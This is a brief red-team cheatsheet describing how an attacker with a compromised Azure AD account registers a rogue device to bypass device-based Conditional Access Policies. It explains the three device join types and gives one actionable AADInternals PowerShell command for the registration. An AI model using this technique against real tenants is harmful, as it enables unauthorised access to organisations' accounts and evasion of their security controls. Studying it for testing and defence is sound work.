Malicious Device Join
A cheatsheet for Malicious Device Join targeting Conditional Access Policy bypass through unauthorized device registration and certificate manipulation vulnerabilities.
Author: otter
This technique allows to bypass Conditional Access Policies based on device ownership.
Since devices are identified with certificates created during the registration process, all we need is access to a user account that can register a new device that can be set up to use the user's PRT. There are 3 different Device Join types which change based on the characteristics of the the joined device:
- Registered: personal devices
- Joined: owned by an organization
- Hybrid Joined: owned by an organization but logons are controlled by an AD service account
To join a device with our compromised account we can use the following command which will generate the required certificate
PS /home/otter> Join-AADIntDeviceToAzureAD -DeviceName "Otter's Comptuter" -DeviceType "Windows" -OSVersion "10.0.19044.2364"
Now we can use this device to log in as the compromised user without having to worry about the Conditional Access Policy.